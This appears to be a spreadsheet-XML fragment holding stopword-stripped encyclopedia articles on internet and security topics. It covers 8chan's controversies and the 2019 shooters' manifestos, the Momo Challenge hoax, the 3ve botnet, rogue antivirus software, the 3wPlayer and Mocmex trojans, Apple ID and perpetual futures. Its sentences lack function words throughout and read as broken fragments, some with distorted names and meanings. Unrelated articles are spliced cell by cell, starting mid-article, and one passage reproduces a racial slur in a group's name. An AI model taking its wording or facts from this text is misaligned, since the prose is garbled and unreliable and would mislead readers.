guards, federal employees.after receiving questions guardian following attack, cyberattack protection company ddos-guard terminated service 8kun's hosting provider, vanwatech. speaking guardian, ddos-guard's owners explained company providing services vanwatech, 8kun directly, "were related political issues want associated sense customers hosting toxic sites like qanon/8chan". cyberattack protection services restored 8kun vanwatech began using american company fiberhub.on august 2021, u.s. house representatives select committee investigating storming capitol demanded records 8kun (alongside social media companies) going back spring 2020. controversies numerous controversies related content posted 8chan arisen, extent participation individuals companies website cause controversy. february 2019, nordic hosted (ask anything) thread video games board website, /v/, later apologized. gamergate september 2014, 8chan became entangled gamergate controversy 4chan banned discussion gamergate, whereupon 8chan became several hubs gamergate activity. site little-known prior controversy. 8chan's initial gamergate-oriented board also gained attention compromised members internet troll group nigger association america, forcing gamergate activists migrate "/gamergate/". this replacement quickly became site's second-most accessed board. swatting incidents violent threats january 2015, site used base swatting exploits portland, seattle, burnaby, british columbia, tied victims' criticism gamergate 8chan's association attacks coordinated board website called "/baphomet/". victims swatting attack said singled followed someone twitter. february 2015, content "/baphomet/" subboard wiped personal information katherine forrest, presiding judge silk road case, posted there.in 2019, post threatening mass shooting bethel park high school posted 8chan; result, 18-year-old individual arrested charged count terroristic threats count retaliation witness victim. child pornography boards created discuss topics child rape. while sharing illegal content site rules, daily wrote boards exist share sexualized images minors provocative poses, users boards post links explicit child pornography hosted elsewhere. when asked whether boards inevitable result free speech, brennan responded: "unfortunately, yes. don’t support content boards mentioned, simply cost free speech active site impose 'laws' passed washington, d.c."in august 2015, 8chan blacklisted google search google described content constituting "suspected child abuse content". donald trump presidential campaign july 2016, u.s. presidential candidate donald trump tweeted image hillary clinton background money six-pointed star resembled star david, containing message "most corrupt candidate ever". image posted 8chan's /pol/ board early june week trump's team tweeted watermark image twitter account published many overtly racist antisemitic images. qanon 8chan home discredited far-right qanon conspiracy theory.in october 2017, 4chan user referred started gaining attention attention promoting conspiracy theories deep state. next month, citing security concerns, moved 8chan posted eventually leading international movement. sean hannity retweeted qanon hashtags twitter feed. march 2018, initial group followers reddit banned promotion theory. they quickly regrouped subreddit, featured posts anonymous posters 8chan reader-friendly format. subreddit banned second time september 2018. with flood users board, asked website's owners, watkins, upgrade website's servers order accommodate board's website traffic september 2018.the movement linked pizzagate conspiracy theory. movement also linked hashtags #thegreatawakening #wwg1wga, stands "where one, all"; also sometimes linked phrase "follow white rabbit". louisiana police's antifa list september 2018, louisiana state police scrutinized using hoax list personal information supposed antifa activists originally posted 8chan's politics board. document, dubbed "full list antifa.docx" police officers, actually contained names several thousand people signed online petitions then-president donald trump. state police refused disclose list, claiming would "compromise" ongoing criminal investigations expects arrests. lawsuit louisiana state police filed behalf record requester harvard lecturer former public defender thomas frampton, alleging police's refusal release list indicates actually believed credibility hoax list used investigations litigations. 2019 shootings perpetrators three mass shootings, 2019, used 8chan spread manifesto. result, increased pressure providing 8chan's internet services terminate support, services companies' withdrawal providing domain registry, taking website clearnet. christchurch mosque shootings prior attacks mosques christchurch, zealand, march 2019, perpetrator, brenton harrison tarrant, posted links ultimately 17-minute facebook live video first attack noor mosque white nationalist, neo-fascist manifesto great replacement (named french far-right conspiracy theory name writer renaud camus) detailing anti-islamic anti-immigration reasons attack. shootings overall left dead injured. some members 8chan re-shared applauded attacks.on march 2019, australian telecom companies telstra, optus, vodafone denied millions australians access websites 4chan, 8chan, zero hedge, liveleak reaction christchurch mosque shootings.new zealand isps spark, vodafone, 2degrees, near monopoly broadband mobile market share zealand, also followed suit blocking 4chan, 8chan, zero hedge, liveleak number weeks following shootings, blocking 8chan similar websites level attempt prevent proliferation widely accessible content classified objectionable chief censor zealand. poway synagogue shooting john earnest, alleged perpetrator shooting synagogue poway, california, april 2019, earlier arson attack mosque nearby escondido march posted links open letter attempted livestream 8chan, earnest also named place radicalization him. according 8chan's twitter, shooter's post removed nine minutes creation. paso shooting patrick crusius, suspect mass shooting walmart store paso, texas, august 2019, allegedly posted four-page white nationalist manifesto inconvenient truth 8chan less hour shooting began. 8chan moderators quickly removed original post, though users continued circulate links manifesto. also list social networking websites dlive (social network) minds parler voat references</t>
  </si>
  <si>
    <t>Momo Challenge hoax</t>
  </si>
  <si>
    <t>"momo challenge" hoax internet urban legend rumored spread social media outlets. reported children adolescents enticed user named momo perform series dangerous tasks including violent attacks, self-harm suicide. despite claims phenomenon reached worldwide proportions july 2018, number actual complaints relatively small enforcement agency confirmed anyone harmed direct result it.the challenge reported become worldwide phenomenon" 2018 indonesian newspaper reported caused 12-year-old girl kill herself. awareness grew february 2019 police service northern ireland posted public warning facebook, american media personality kardashian posted instagram story pleading youtube remove alleged "momo" videos. challenge claims have) existed united states, canada, united kingdom, australia, ireland, india, luxembourg, belgium, malaysia, peru, pakistan, germany, philippines, singapore, south korea, thailand, france, italy, switzerland, indonesia, brunei, hong kong, spain, portugal, mexico, colombia, chile, bulgaria, argentina, brazil, dominican republic. background reactions momo challenge gained public's attention july 2018, information supposed challenge outlined discussed videos produced youtuber, reignbot. targeting teenagers, people presenting character named momo whatsapp messages persuade people contact cell phone. internet hoaxes presented challenges "blue whale", players instructed perform succession tasks; refusal threats. messages subsequently accompanied frightening gory pictures. although panic eventually died throughout rest 2018, returned much pervasive form early 2019, claimed momo inserted seemingly innocuous youtube youtube kids videos peppa fortnite; claims repeated group national online safety.although authorities confirmed physical harm resulting this, even sustained exchange messages took place momo character anybody, police forces school administrations several continents issued warnings momo challenge repeated common advice internet safety. whatsapp encouraging users block phone numbers engaging practice report company.commenting numerous rumours suicide related momo challenge, security experts folklorists studying urban legends stated phenomenon likely case moral panic: sensationalized hoax fuelled unverified media reports. benjamin radford says "the blue whale game momo challenge hallmarks classic moral panic", "fuelled parents' fears wanting know kids there's inherent fear young people technology." september 2018, phone numbers supposedly associated "momo" service. founder fact-checking site snopes, david mikkelson, doubts anybody actually came harm said whole thing "may primarily product bullies pranksters latching onto handy mechanism goad torment vulnerable youngsters rather intrinsic part particular social media challenge."in response reports early 2019, youtube said "not received links videos showing promoting momo challenge youtube" permits news stories videos intended raise awareness educate alleged phenomenon. website demonetized videos mentioning momo, including news organizations, saying content violates advertiser-friendly content guidelines. also placed advisory warnings momo videos alerting viewers "inappropriate offensive" content. spread asia india, central bureau investigation (cbi) west bengal indicated august 2018, claims reported media death teens linked momo challenge "far fetched devoid evidence". believes large volume momo challenge invitations india originate locally pranks sent spread panic. spokesperson stated far, game claimed victim, anyone approached saying played even first level it." statement followed weeks news coverage unconfirmed cases. after alerted youth received momo challenge invitation, police west bengal issued warning, cybercrime unit opened investigation. mumbai police previously started warn population, although complaints filed. police confirm role momo challenge might played death girl grade died suicide leaving note expressing discouragement grades suicide engineering student madras. odisha police, issuing advisory asked media refrain publishing unconfirmed reports linking teen death momo challenge.pakistan's minister information technology announced government intended draft legislation making crime distribute momo challenge blue whale challenge.police authorities philippines issued warnings parents vigilant children's online activity 11-year-old died apparent suicide drug overdose january 2019, linking incident viral challenge, although official confirmation direct relation incident established authorities. aftermath reports, raffy tulfo youtubers voiced condolences family, encouraging children monitored parents. they also linked blue whale challenge incident. europe france, group state department reviewing situation daily late july 2018. complaint filed november father whose died suicide.in germany, police aware mentions made chain letters. they asking population prudently faced kind cell phone contact.the luxembourg police confirmed case territory, harm caused.the belgian public prosecutor's office reported november 2018 13-year-old victim momo challenge hanged himself.spain's national police warned people stay away "challenge" applications whatsapp, indicating momo phenomenon vogue among teenagers.in united kingdom, school administrations relayed warnings phenomenon. reports awareness alleged challenge rose february 2019 police service northern ireland issued public warning. british authorities challenge used cybercriminals gain personal identity information. responding tabloid coverage asserted challenge true, nspcc, samaritans, safer internet centre issued statements stating momo challenge hoax. parent alerted press momo challenge subsequently said child received messages "momo", merely told school playground conversation. nevertheless, authorities media issued online safety precautions. nicola harteveld (who said targeted challenge) clinical psychologist anna colton warned itv's daytime show this morning search momo online advised parents aware children's activity online. north america canadian province quebec, local police forces longueuil, sherbrooke gatineau indicated people jurisdiction approached participate momo challenge report victims. they asked people phone number provided whatsapp messages send screen capture images phone police authorities. royal canadian mounted police police forces monitoring spread phenomenon could confirm actual victim.mexican authorities investigating internet crimes distributed detailed information parents methods scheme. they suspect spread facebook group frequented young people. they warned caught scheme risked self-harm, hacking extortion.in early august 2018 united states, various local police forces warned population dangers phenomenon. some jurisdictions received several complaints, jurisdiction reported anybody harmed. momo character also appeared popular game minecraft form in-game skins unofficial mods created game's users. police officer ohio concerned momo son's copy game, worried possibility could lead participation momo challenge. after news reports started outline link minecraft momo challenge, microsoft announced taking measures "restrict access mod" question. south america argentina, despite several media reports tentatively establishing relationship momo challenge suicide 12-year-old girl ingeniero maschwitz, link confirmed authorities.authorities brazil confirmed case linked momo challenge. national safernet non-profit organization approached concerned parents warned variety schemes extort money information people.the colombian police confirmed news reports linking death youths barbosa momo challenge early september. picture early news reports stating image momo sculpture japanese artist midori hayashi turned incorrect. hayashi indicated piece, internet users identified link factory, japanese special effects company, correct author sculpture.the sculpture bulging eyes beak-like mouth. also human-like breasts. pictures sculpture first posted online 2016, publicly exhibited. firm denies involvement hoax. japanese artist keisuke aiso confirmed march 2019 sculpture thrown away 2018, materials (natural rubber plant oils) decomposed. popular culture march 2019, saturday night live parodied meme video featuring kate mckinnon terrifying chicken-suited fast food mascot named "bok bok," narrator says "does bear slight resemblance internet urban legend momo." narrator says, promise, momo chicken suit," despite also human-bird hybrid loves company children." end, narrator admits, "yeah, that's probably momo."in july 2019, orion pictures said developing film adaptation, producers (with production company vertigo entertainment) taka ichise. also moral panic blue whale challenge, similar alleged 'suicide game' revolving around internet. charlie charlie challenge references</t>
  </si>
  <si>
    <t>3ve</t>
  </si>
  <si>
    <t>botnet operated 2013 2018. history 3ve, pronounced “eve”, botnet halted late 2018. botnet first discovered 2016 white ops, active since least 2013. discovery start 2017 investigation. botnet utilized malware packages boaxxe kovter infect network pcs. they spread emails fake downloads, infected, bots would generate fake clicks online advertisements. clicks would used fake websites, hosted absorbed revenue false impressions. bots able mimic desktop mobile traffic order evade detection, went several evolutions tactics grow time.at peak, botnet controlled million residential corporate ip-addresses, largely within europe north america. estimated million infected time, clicking thousand fake websites 250,000 total webpages, taking revenue sixty thousand digital advertising accounts placing false ads. network issued three billion fraudulent daily requests. about thirty million dollars stolen time botnet use. closure shut collaboration multiple organizations, including white ops, google, department homeland security, internet crime complaint center. other organizations involved included adobe, trade desk, amazon advertising, oath, malwarebytes, eset, proofpoint, symantec, f-secure, mcafee, trend micro. following investigation took botnet, department justice issued thirteen indictments eight individuals, case united states attorney richard donoghue. individuals charged russia, kazakhstan. additionally, internet domains servers seized fbi. references</t>
  </si>
  <si>
    <t>Archive file</t>
  </si>
  <si>
    <t>computing, archive file computer file composed files along metadata. archive files used collect multiple data files together single file easier portability storage, simply compress files less storage space. archive files often store directory structures, error detection correction information, arbitrary comments, sometimes built-in encryption. applications portability archive files particularly useful store file system data metadata within contents particular file, thus stored systems sent channels support file system question, file contents examples include sending directory structure email, files names unsupported target file system length characters, retaining files' date time information.additionally, facilitates transferring high numbers small files resources saved pages, since container file transferred using single file operation, whereas transferring many small files requires computer modify file system structure file individually, making considerably slower. software distribution beyond archival purposes, archive files frequently used packaging software distribution, software contents often naturally spread across several files; archive known package. while archival file format same, additional conventions contents, requiring manifest file, resulting format known package format. examples include debian, java, android, self-extracting windows installer executables. features features supported various kinds archives include: converting metadata data stored inside file (e.g., file name, permissions, etc.) checksums detect errors data compression file concatenation store multiple files single file file patches updates (when recording changes since previous archive) encryption error correction code errors splitting large file many equal sized files storage transmissionsome archive programs self-extraction, self-installation, source volume medium information, package notes/description. file extension file header archive file indicators file format used. computer archive files created file archiver software, optical disc authoring software, disk image software. archive formats archive format file format archive file. some formats well-defined authors become conventions supported multiple vendors communities. types archiving formats store metadata concatenate files. compression formats compress files. multi-function formats store metadata, concatenate, compress, encrypt, create error detection recovery information, package archive self-extracting self-expanding files. software packaging formats used create software packages self-installing files. disk image formats used create disk images mass storage volumes. examples filename extensions used distinguish different types archives include zip, rar, tar, first widely implemented.java also introduced whole family archive extensions java web). they used exchange entire byte-code deployment. sometimes also used exchange source code text, html files. default compressed. error detection recovery archive files often include parity checks checksums error detection, instance files cyclic redundancy check (crc). archives include additional error correction data (called recovery records).archive files natively support recovery records separate parchive (par) files allows additional error correction recovery missing files multi-file archive. also file archiver disk image digital container format, similar concept media files references "application note .zip file format"- official white paper published pkware, inc. tape archive (.tar) file format specification- excerpt file format list maischein "ibm magnetic tape reader/recorder archives "1401 data processing system" archives external links file archive formats curlie</t>
  </si>
  <si>
    <t>Personal Internet Security 2011</t>
  </si>
  <si>
    <t>personal internet security 2011 scareware rogue anti-virus. fake computer protection program induces users think number viruses, personal internet security fact virus itself. program encourages users certain amount subscription clean computers "protect" computers. users also notice different number viruses listed every time virus pops also antivirus (malware) references</t>
  </si>
  <si>
    <t>Personal Antivirus</t>
  </si>
  <si>
    <t>personal antivirus rogue anti-virus software created company named innovagest (sometimes referred "innovagest 2000"), related rogue software. claims anti-virus program, instead merely displays false warnings virus spyware infections, demands money clean infections. description common personal antivirus installs computer malicious pop-up (though also installed part malicious video codec package). when user visits website hosting personal antivirus pop-up window appears, claiming scanning computer virus infections. this "scan" inevitably finds number virus infections. afterward, user told need personal antivirus clean infections, directed site accepts payments. user decides install program, personal antivirus claims repaired infections, also regularly advertises additional programs demands money regular intervals. york times site september, 2009, york times site unwittingly started randomly display related personal antivirus. york times uses in-house advertising advertising networks display site. person responsible originally requested york times vonage voip service. because vonage previously advertised directly york times, approved delivered third-party network unfamiliar times. september 2009, vonage originally approved switched personal antivirus ads. these continued displayed throughout following weekend. eventually stopped york times temporarily disabled displayed third-party networks investigated source personal antivirus ads. york times later advised readers using reputable, properly-updated anti-virus program would likely resolve lingering infections personal antivirus. they also discovered weekend, sites experienced similar malicious ads, possibly including site francisco chronicle. references</t>
  </si>
  <si>
    <t>Aptum Technologies</t>
  </si>
  <si>
    <t>aptum technologies, formerly cogeco peer provider services data centers cloud computing. company headquartered toronto, ontario, canada. history peer network enterprises founded 1996 vancover, british columbia, funded 2003. 2004, peer acquired serverbeach us$7.5 million. serverbeach based antonio, texas, founded january 2003 rackspace co-founder richard yoo. serverbeach hosted video site youtube december 2007. 2005, peer acquired interland, inc. assets us$14 million, investment million, celerity partners, menlo park, california. 2010 peer business peer hosting, listed public company toronto stock exchange symbol pix, reporting yearly revenues cdn$98 million. 2012, peer acquired hosting provider netbenefit million pounds, group limited.cogeco cable purchased peer hosting december, 2012. formed cogeco peer specializing managed hosting, dedicated servers, cloud services colocation. february 2019, cogeco agreed sell cogeco peer inc. investment firm digital colony. deal closed 2019.in august, 2019, cogeco peer changed name aptum technologies. susan bowen chief executive time.the canadian co-location business sold estruxture may, 2021. june, 2021, parent digital colony, colony capital, based boca raton, florida, announced would rebrand called digitalbridge. references external links official website</t>
  </si>
  <si>
    <t>Mobile virus</t>
  </si>
  <si>
    <t>3wPlayer</t>
  </si>
  <si>
    <t>3wplayer malware disguises media player. infect computers running microsoft windows. designed exploit users download video files, instructing download install program order view video. 3wplayer employs form social engineering infect computers. seemingly desirable video files, recent movies, released bittorrent distribution channels. these files resemble conventional files, engineered display message played media player programs, instructing user visit 3wplayer website download software view video. 3wplayer infected trojan.win32.obfuscated.en according symantec, 3wplayer "may download" piece adware refer adware.lop, "adds toolbar search button internet explorer".a perl script posted online reportedly decrypt 3wplayer files back avi. this claim tested mixed results, intended file rarely desired video file. some developers made application automatically identify 3wplayer encrypted files. clones there multiple 3wplayer clones: divocodec x3codec divocodec divo codec x3codec also identified trojan similar 3wplayer. users instructed download codec order view play avi/mp4/mp3/wma file, often downloaded programs. instead actual codecs, divocodec installs malware users computer. divocodec polymorphic change structure. also known write another process' virtual memory (process hijacking). domplayer domplayer similar divocodec 3wplayer. users also instructed download player order view file. divocodec, false .avi easily spotted duration file, usually lying 10–12 seconds, conclude chance file film/tv series, despite size file. this always case however, many distributors recently begun falsifying file meta data display normal durations file sizes. player player similar domplayer, instructs users download player view file. also circulated 5-second video disguised file instructing users install player. references external links symantec security briefing clears file player related data [https://web.archive.org/web/20071102131716/http://www.goitexpert.com/entry.cfm?entry=domplayer-3wplayer-fix same above, little explanation (removes faulty header files)</t>
  </si>
  <si>
    <t>Apple Open Directory</t>
  </si>
  <si>
    <t>apple open directory ldap directory service model implementation apple inc. directory service software stores organizes information computer network's users network resources allows network administrators manage users' access resources. context macos server, open directory describes shared ldapv3 directory domain corresponding authentication model composed apple password server kerberos tied together using modular directory services system. apple open directory fork openldap. term open directory also used describe entire directory services framework used macos macos server. context, describes role macos macos server system connected existing directory domain, context sometimes referred directory services. apple, inc. also publishes called opendirectory framework, permitting macos applications interrogate edit open directory data.with release leopard (10.5), apple chose move away using netinfo directory service (originally found nextstep openstep), used default local accounts groups every release 10.0 10.4. 10.5 uses directory services plugins directory information. local accounts registered local plugin, uses property list (plist) files stored /var/db/dslocal/nodes/default/ backing storage. implementation macos server macos server host open directory domain configured open directory master. addition local directory, openldap-based ldapv3 domain designed store centralized management data, user, group, computer accounts, systems access. directory domain paired open directory password server and, optionally, kerberos realm. either provides authentication model stores password information outside directory domain itself.for kerberos authentication, kerberos realm either hosted kerberos distribution center (kdc) running server system, server participate existing kerberos realm. services kerberized, password server provides following simple authentication security layer-based authentication methods: apop cram-md5 diffie–hellman exchange digest-md5 ms-chapv2 ntlm manager webdav-digestany server system prior 10.7 (lion) configured active directory master windows primary domain controller (pdc), providing domain authentication services microsoft windows clients. directory services framework general sense, open directory describe plugins model used directory utility directory services framework macos macos server. this could thought analogous name service switch systems unix-like operating systems. when connected directory system, macos client server authenticate users, lookup contacts, perform service discovery name resolution following types directories: authentication contacts microsoft active directory ldapv3, including open directory domain 2307-compliant system apple/next netinfo domains flat files service discovery name resolution appletalk windows (netbios wins) service location protocol (slp) multicast (bonjour/zeroconf) history open directory began server 10.2. initial form, open directory consisted network-visible netinfo directory domain corresponding authentication manager service storing passwords outside directory. version 10.2 also included support kerberos. versions 10.1 10.0 stored user password information within directory domain using crypt password authentication authorities, version 10.2 paved current shadow hash password server mechanisms.password server successor authentication manager, introduced open directory server 10.3. open directory also first version ldapv3 directory domain. server 10.4 includes open directory introduced active directory domain member support, trusted directory binding, increased robustness.mac server 10.5 features open directory support cross-domain authorization built-in radius server managing airport base stations. open directory longer includes elements netinfo. more list ldap software active directory freeipa netinfo references</t>
  </si>
  <si>
    <t>MobileIron</t>
  </si>
  <si>
    <t>mobileiron inc. american software company provided unified endpoint enterprise mobility management (emm) mobile devices, multi-factor authentication (mfa). company announced september 2020 acquired ivanti. history company founded 2007 ajay mishra suresh batchu headquartered mountain view, california. mobileiron early pioneer mobile security management smartphones tablet computers, iphone, ipad, android, earlier mobile devices symbian windows phone. during five year period 2009 2013, mobileiron mentioned trade press. initial public offering (ipo) 2014 nasdaq ticker symbol mobl.after share price fell time early 2016, company's founding tinker replaced barry mainz ceo, remained company's board directors. simon biddiscombe appointed october 2017. products mobileiron's software allows security management mobile devices smartphones tablet computers enterprise environment, well secure mobile access enterprise data. june 2015 held 9.2% global market share.mobileiron mentioned trade press 2015 2016.as 2016, mobileiron's principal competitors include microsoft's enterprise mobility suite. other major competitors ibm, well sap, dell/vmware blackberry entered market acquisition previously independent vendors sybase, airwatch good technology.in january 2018, mobileiron partnered google cloud distribute google apps mobileiron’s platform provide secure enterprise applications services portal. acquisition after announcement september, december 2020 mobileiron acquired ivanti $872 million. references external links official website</t>
  </si>
  <si>
    <t>Mocmex</t>
  </si>
  <si>
    <t>mocmex trojan, found digital photo frame february 2008. first serious computer virus digital photo frame. virus traced back group china. overview mocmex collects passwords online games. virus able recognize block antivirus protection hundred security companies windows built-in firewall. mocmex downloads files remote locations hides randomly named files infected computers. therefore, virus difficult remove. furthermore, spreads portable storage devices plugged infected computer. industry experts describe writers trojan horse professionals describe mocmex "nuclear bomb malware". protection mocmex described serious virus, protection hard. first all, important update antivirus software, updated antivirus works unless malware writers ahead antivirus vendors (which happened mocmex). another check digital photo frame malware macintosh linux machine plugging computer windows, disable autorun windows. effects large part digital photo frames manufactured china, particularly shenzhen. negative publicity followed media reports chinese virus expected negative effects chinese manufacturers. mocmex happened months quality problems toys manufactured china raised attention western countries leading quality image chinese products. references</t>
  </si>
  <si>
    <t>Mod Archive</t>
  </si>
  <si>
    <t>archive site dedicated indexing archival playable music module files. allows anyone upload modules, provides charts, reviews ratings music files based community effort. formats covered site mod, ahx, med, stm, s3m, mo3, mtm, 669, amf, ams, dbm, digi, dmf, dsm, far, gdm, imf, j2b, mdl, mptm, mt2, okt, plm, ptm, stm, hvl. history archive established 1996 place tracker artists upload work. since then, site emerged community artists module enthusiasts. effort make website dynamic, community part site added around 2000, form message boards indexed search engine. having lacked proper maintenance since around 2004, however, site went complete reimplementation, beginning november 2005 leaving private beta august 2006. 2007, site moved onto dedicated hardware cope sudden increase popularity following improvements.since 2006, site also provided method bulk downloads archive files bittorrent. operations quality control having moved sponsored, shared platform 2007, website currently resides dedicated server. result increased costs related running dedicated hardware, site seeks help community covering running costs. since anyone upload files website, uploaded files manual screening process checked integrity quality site staff. reusing tracker music files published website requires song's author permission. mentions publications modarchive mentioned music freeware roundup sound sound magazine.modarchive (v3.1) featured site month computer music magazine. references external links official website bittorrent tracker</t>
  </si>
  <si>
    <t>Mod openpgp</t>
  </si>
  <si>
    <t>mod_openpgp apache server module authored arturo 'buanzo' busleiman implements access authorization servers, virtual hosts, directories incoming requests' http openpgp signatures valid known local keyring. it's apache server companion enigform extension mozilla firefox. prior version 0.2.2, mod_openpgp known mod_auth_openpgp. mod_openpgp participated owasp summer code 2008. also references external links buanzo.org's wiki "mod_openpgp". freecode. mod_openpgp google code mod_openpgp open mod_auth_openpgp open</t>
  </si>
  <si>
    <t>Apple ID</t>
  </si>
  <si>
    <t>apple authentication method used apple iphone, ipad, apple devices. apple contain user personal information settings. when apple used apple device, device automatically settings associated apple operation creation account apple account created free charge apple page. apple valid email address, protected password user least eight characters. apple send verification email email address user provided user required follow included verification email activate account. possible create apple without specifying credit card.in march 2013, apple launched optional two-step verification security feature authentication. when enabled, second verification step required using apple certain conditions, login, making store purchase device. feature uses find service send four-digit code trusted device associated apple second verification step required authentication. modification users change passwords personal information apple page selecting "manage account" link. changes user makes apple account, whilst using apple product, also recognized applications user uses apple account (for example, online apple store, icloud, iphoto). apple send verification email email address provided user required follow included verification email confirm changes. after confirming changes, users still asked verify information next time apple purchase online, using itunes store. apple also allows users change name apple users must contact apple customer service make change. retrieval apple disabled security reasons password entered incorrectly multiple times. user warned message account disabled. apple passwords retrieved answering account security questions iforgot resetting trusted device icloud enabled unlock passcode set. security reasons, recovery two-step verification (not two-factor authentication) turned apple reset password apple account. reset password security features enabled, recovery least trusted device required. disabled accounts another error "your apple disabled" without specific disclosure reason. cause suspension likely violation apple media services terms conditions (i.e., scams fraudulent activities) resetting one's password clear reported occurring devices well macs pcs. request review apple contacting itunes store support www.apple.com/support/itunes. august 2021, accuracy system, decisions disable apple rarely overturned, likelihood system would incorrectly disable given apple less trillion year (most likely csam detection, safety feature apple proposed later shelved).in cases, user's profile visible anyone imessage facetime, able sign issue needs resolved within period time (approximately 14-30 days cases). much time passed since apple disabled, permanently disabled user longer unlock create apple ids. multiple apple users different apple store purchases icloud storage uses. this includes many mobileme users always difficulties forced apple signing-up mobileme service apple automatically created using me.com email address created time, meaning users could change previous apple email address me.com email address always remained apple permit different accounts merged. however, account disabled cases, fraudulent transactions abusive activity security reasons), accounts associated primary account also disabled, user cannot create accounts affected account unlocked. apple online discussions apple discussions user-to-user support forum apple experts users together discuss apple products. user browse read discussion forum without need apple however, apple gives user ability participate apple discussion websites allowing user questions apple hardware software products, receive help, tips, solutions apple users. iwork publishing iwork publishing allowed apple user upload share iwork projects pages, numbers, keynotes. published contents could viewed publicly whoever user invited iwork.com. user need know whether colleagues since iwork based service, anyone browser internet connection july 2012, iwork.com shut favor icloud, apple's cloud service. facetime imessage facetime video calling application later snow leopard later. apple required facetime owns iphone (one make calls iphone number mac, ipod, ipad). imessage instant messaging application later, watchos, mountain lion later. apple required imessage owns iphone. apple online store apple required place order apple online store. apple lets buyers place orders online store without apple using guest checkout feature. apple guest checkout feature allow customer access order info invoices, check order status, track shipping package. however, apple allow users customize apple online store experiences. users save items interested purchasing; save cart almost ready place order; save shipping billing addresses payment information speed checkout process; 1-click ordering apple's website check apple gift card balances. apple digital stores apple gives users access buying downloading free) later free re-download many apple-based resources, including: itunes store: music, movies, shows, podcasts, audiobooks, mobile phone ringtones. ibooks store: ebooks, interactive books, digital textbooks (usable devices macs running mavericks). store: apps. store: macos apps.itunes store, store (for apps), store, ibooks store, newsstand make apple purchase digital media movies music itunes store store, apple required. user apple password sign itunes store store content authorize items user purchased. proof ownership content user previously downloaded apple digital stores. apple allows user re-download purchased content devices. itunes computers, apple authorized copy purchased content five computers time. apple confirmed exactly many devices purchased content according apple support "your apple devices computers (combined) associated it." icloud icloud allows users store data music applications remote computer servers download multiple devices ios-based devices running later, personal computers running 10.7.2 lion later, microsoft windows (windows vista service pack later). icloud replaced apple's mobileme service, acting data syncing center email, contacts, calendars, bookmarks, notes, reminders (to-do lists), iwork documents, photos data. service also allows users wirelessly back-up devices icloud instead manually using itunes. every apple comes free storage. purchase additional storage wish sign apple june 2019, apple unveiled single sign-on provider built around apple known "sign apple". based oauth openid connect, designed privacy-focused alternative social login services, minimizing amount personal information sent service, allowing disposable email addresses forwarding user's apple email. also apple developer references external links official website</t>
  </si>
  <si>
    <t>Mollom</t>
  </si>
  <si>
    <t>mollom service analyzed quality content posted websites. this included comments, contact-form messages, blogs, forum posts. mollom screened contributions posted participating websites. overview mollom originally developed dries buytaert, also founder lead developer drupal cms. used three specific technologies detect spam malicious content machine learning, text analytics, captcha. according acquia, mollom's launch march 2008 acquisition acquia august 2012, mollom blocked billion spam messages customers, including sony music, stanford university, twitter.mollom acquired acquia august 2012. april 2017, company announced would stop sale mollom service 2017. service shut completely april 2018, blocked 13.5 billion spam comments since inception. references</t>
  </si>
  <si>
    <t>Perpetual futures</t>
  </si>
  <si>
    <t>finance, perpetual futures contract, also known perpetual swap, agreement non-optionally sell asset unspecified point future. perpetual futures cash-settled, differ regular futures lack pre-specified delivery date, thus held indefinitely without need roll contracts approach expiration. payments periodically exchanged holders sides contracts, long short, direction magnitude settlement based difference contract price underlying asset, well applicable, difference leverage sides. perpetual futures first proposed economist robert shiller 1992, enable derivatives markets illiquid assets. however, perpetual futures markets developed cryptocurrencies, following introduction 2016 bitmex. cryptocurrency perpetuals characterised availability high leverage, sometimes times margin, auto-deleveraging, compels high-leverage, profitable traders forfeit portion profits cover losses side periods high market volatility, well insurance funds, pools assets intended prevent need auto-deleveraging. perpetuals serve function contracts difference (cfds), allowing indefinite, leveraged tracking underlying asset flow, differ single, uniform contract traded exchange time-horizons, quantities leverage, positions, opposed separate contracts separate quantities leverage typically traded directly broker. history holding futures contract indefinitely requires periodically rolling contract contract's expiry. however, given futures prices typically differ spot prices, repeatedly rolling contracts creates significant basis risk, leading inefficiencies used hedging speculation. attempt remedy ills, chinese gold silver exchange hong kong developed "undated futures" market, wherein one-day futures would rolled automatically, difference future spot prices settled counterparties.in 1992, robert shiller proposed perpetual futures, alongside method generating asset-price indices using hedonic regression, accounting unmeasured qualities adding dummy variables represent elements index, indicating unique quality element, form repeated measures design. this intended permit creation derivatives markets illiquid, infrequently-priced assets, single-family homes, well untraded indices flows income, labour costs consumer price index.the first significant uses perpetual futures came form cryptocurrency contracts, first offered bitmex 2016, became popular amongst traders permitting highly-leveraged trading different time-horizions liquid market without inordinate counterparty risk absence regulated intermediaries. result, $1.7t cryptocurrency derivatives traded third quarter 2020, large majority volume consisting perpetual futures. mechanism perpetual futures value cash flow, dividend index, envisioned shiller, require payment daily settlement, intended mirror value flow, side contract other. dividend {\displaystyle s_{t+1}} paid shorts longs, defined {\displaystyle s_{t+1}=(f_{t+1}-f_{t})+(d_{t+1}-r_{t}f_{t})} {\displaystyle f_{t}} price perpetual {\displaystyle d_{t}} dividend paid owners underlying asset {\displaystyle r_{t}} return alternative asset (expected short-term, low-risk rate) time t+1. used cryptocurrency markets perpetual contracts offered cryptocurrency derivative exchanges typically priced versions formula, difference cryptocurrency prices thought dividend owners asset. however, number conventions developed cryptocurrency perpetual market greater volatility lack regulatory requirements mandating particular market structure. unlike traditional futures, cryptocurrency perpetual typically uses cryptocurrency base currency, making inverse futures. settlement different sides trade, known funding, typically occurs every eight hours. addition, given lack cryptocurrency repo market and, consequently, overnight rate, base interest cryptocurrency perpetual usually fixed percentage exchange. liquidation insurance funds cryptocurrency derivatives exchanges lack central counterparty clearing, intermediaries regulated derivatives markets take collateral adjust margin requirements attempt eliminate counterparty risk, risk holders side contract fail cover obligations event margin call adverse price move. result, liquidation performed side contract reaches bankruptcy, contract's remaining margin reaches pre-specified value (the maintenance margin, determines liquidation price). exchange able close contract profit, proceeds typically inserted exchange's insurance fund, guarantees profitable side counterparty margin insufficient, usually price asset moved sharply direction, exchange unable liquidate profit. auto-deleveraging accounts ranked according profit leverage exchange's insurance fund depleted, whether globally particular contract. this used form "auto-deleveraging" queue, positions traders front queue closed bankruptcy price prevent market losers going default. auto-deleveraging intended reduce counterparty risk penalizing riskiest traders, opposed evenly-spread "mutualized" model used central clearing, balance risk fully automated manner, requiring manual discretion intermediaries. also futures contract contract difference references</t>
  </si>
  <si>
    <t>MonaRonaDona</t>
  </si>
  <si>
